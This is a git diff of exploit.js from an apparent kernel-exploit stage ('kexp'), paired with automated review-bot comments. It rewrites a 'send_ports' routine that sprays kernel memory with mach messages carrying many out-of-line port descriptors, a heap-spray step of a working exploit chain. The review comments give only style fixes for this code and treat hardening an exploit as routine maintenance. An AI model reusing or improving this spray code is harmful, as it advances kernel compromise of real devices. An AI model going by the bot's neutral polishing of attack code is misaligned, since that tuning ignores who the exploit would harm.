-rwxr-xr-xsrc/stage4/kexp/exploit.js27
1 files changed, 25 insertions, 2 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index e761184..68ed794 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -221,7 +221,7 @@ function spray_ports(number_port_descs) {
ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
-// p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
+ p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
var ret = read_u32(mp);
shit_heap_free(mp);
@@ -250,6 +250,7 @@ function fast_array_mul(arr, n) {
}
function send_ports(target, payload, num, number_port_descs) {
+ if (0) {
var init_port_set = shit_heap(num * 4);
for (var i = 0; i < num; i++) {
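Review bot: Opening `if (0) {` here and closing it with the `}` added in the next hunk leaves the whole previous large_buf send path in the function as dead code rather than removing it, and because the disabled block still uses function-scoped `var`, its `init_port_set` and `i` hoist and are then redeclared by the `var init_port_set = new mach_port_t(num)` and the `for (var i …)` that follow the block. Delete the disabled block, or if it is kept deliberately for comparison, say so on the fence, e.g. `// legacy inline-buffer path, disabled; superseded by the Request_sp construction below`. The same point applies to the closing `}` hunk. send_ports's body continues past this hunk.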
@@ -281,8 +282,30 @@ function send_ports(target, payload, num, number_port_descs) {
large_buf[req_head_msgh_id >>> 2] = 1337;
// p0laris_log("%s\n", prim_hexdump(read_buf(large_buf_ptr, 0x100)));
+}
+
+ var init_port_set = new mach_port_t(num);
+
+ var InP = new Request_sp(number_port_descs);
+ var InP_obj = InP.deref();
+ InP_obj.msgh_body.msgh_descriptor_count = number_port_descs;
+
+ for (var i = 0; i < number_port_descs; i++) {
+ InP_obj.init_port_set[i].address = init_port_set.addy;
+ InP_obj.init_port_set[i].count = num;
+ InP_obj.init_port_set[i].disposition = 19;
+ InP_obj.init_port_set[i].deallocate = false;
+ InP_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ }
+
+ InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ InP_obj.Head.msgh_remote_port = target;
+ InP_obj.Head.msgh_local_port = 0;
+ InP_obj.Head.msgh_id = 1337;
+
+ InP.write(InP_obj);
- var ret = mach_msg(large_buf_ptr, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+ var ret = mach_msg(InP.addy, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
return ret;
}
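Review bot: The disposition literal `19` is written twice in the new message setup, as `InP_obj.init_port_set[i].disposition = 19` and again inside `MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)`, while the surrounding fields use named mach constants; hoisting it into one named constant next to `MACH_MSG_OOL_PORTS_DESCRIPTOR` keeps the descriptor and header bits from drifting apart. The send size passed to `mach_msg`, `0x1c + (number_port_descs * 0xc)`, is still hand-computed even though the buffer is now sized by `new Request_sp(number_port_descs)`; if Request_sp exposes its length, derive the size from it so the two cannot disagree. The `msgh_id = 1337` on the new message repeats the literal from the removed `large_buf[req_head_msgh_id >>> 2] = 1337`, which would fit the same constant treatment.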